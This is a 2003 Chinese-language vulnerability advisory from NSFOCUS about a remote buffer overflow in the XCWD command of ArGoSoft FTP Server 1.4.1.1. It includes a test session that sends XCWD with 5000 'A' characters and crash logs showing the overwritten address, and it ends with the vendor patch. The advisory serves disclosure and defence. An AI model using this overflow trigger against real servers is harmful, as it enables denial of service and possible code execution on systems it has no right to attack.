安全研究

安全漏洞
ArGoSoft FTP Server XCWD命令远程缓冲区溢出漏洞

发布日期:2003-09-25
更新日期:2003-10-08

受影响系统:
ArGoSoft FTP Server 1.4.1.1
不受影响系统:
ArGoSoft FTP Server 1.4.1.2
描述:
BUGTRAQ  ID: 8704

ArGoSoft FTP Server是一款FTP服务程序。

ArGoSoft FTP在处理XCWD命令时缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞以FTP进程权限在系统上执行任意指令。

攻击者提交包含4096个字节参数的XCWD命令给FTP服务程序,可导致触发缓冲区溢出,精心构建提交参数数据可能以FTP进程权限在系统上执行任意指令。

<*来源:moran zavdi (moraniam@hotmail.com
  
  链接:http://lists.insecure.org/lists/vuln-dev/2003/Sep/0059.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

moran zavdi (moraniam@hotmail.com)提供了如下测试方法:

c:\> putty.exe localhost 21
220 ArGoSoft FTP Server for Windows NT/2000/XP, Version 1.4 (1.4.1.1)
user ftp
502 Unknown command
user ftp
331 User name OK, need password
pass ftp
230 User ftp logged in successfully **
XCWD AAAAAAA....(5000 times)
client closed connection.


the logs look like this:
9/22/2003 1:38:07 PM - FTP Server started. Listening on port 21
9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1
9/22/2003 1:38:49 PM - ( 1) 'Error: Access violation at address 00401F32
in module 'ftpsrvnt.exe'. Write of address 41414145

建议:
厂商补丁:

ArGoSoft
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级程序至1.4.1.2版本:

http://www.argosoft.com/applications/ftpserver/download.asp

浏览次数:4010
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障